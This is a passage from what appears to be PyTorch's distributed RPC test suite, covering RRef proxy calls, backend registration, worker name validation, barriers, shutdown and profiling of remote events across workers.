rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._test_self_remote_rref_as_remote_arg(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def test_world_size_one(self):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
expect = torch.ones(2, 2) * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(torch.ones(2, 2), torch.ones(2, 2))
)
self.assertEqual(expect, result)
expect = torch.ones(3, 3) * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(torch.ones(3, 3), torch.ones(3, 3))
).wait()
self.assertEqual(expect, result)
expect = torch.ones(4, 4) * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(torch.ones(4, 4), torch.ones(4, 4))
).to_here()
self.assertEqual(expect, result)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
worker_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
worker_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def test_wait_all_workers(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 call this immediately and still have some work after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 call this immediately and still have some work after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
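# Shared helper for the rpc barrier tests: reset the leader's counter, enter the
# barrier, have every participant increment the leader's counter, then enter a second
# barrier so the leader can verify that all increments arrived.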
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This test validates the barrier implementation when multiple threads call into it.
# We only need to check that it does not hang in this case.
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload()
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# If cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicating that no memory was profiled).
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixed when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event must be in the above set;
# the set is just a representative sample of what we expect to see. The
# profiler can change and add more events, but we should always expect to
# see this representative set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate the order in which remote events show up in the profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
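# Checks that the remote aten::mul event produced by run_profiling_workload was
# captured and attributed to the destination node.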
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
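# Core profiler helper: on rank 1, issue an RPC in the given execution mode while the
# profiler is active, then verify that the local RPC event and the corresponding remote
# events were recorded (optionally inside a record_function scope).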
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since the RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_idx = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_idx, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
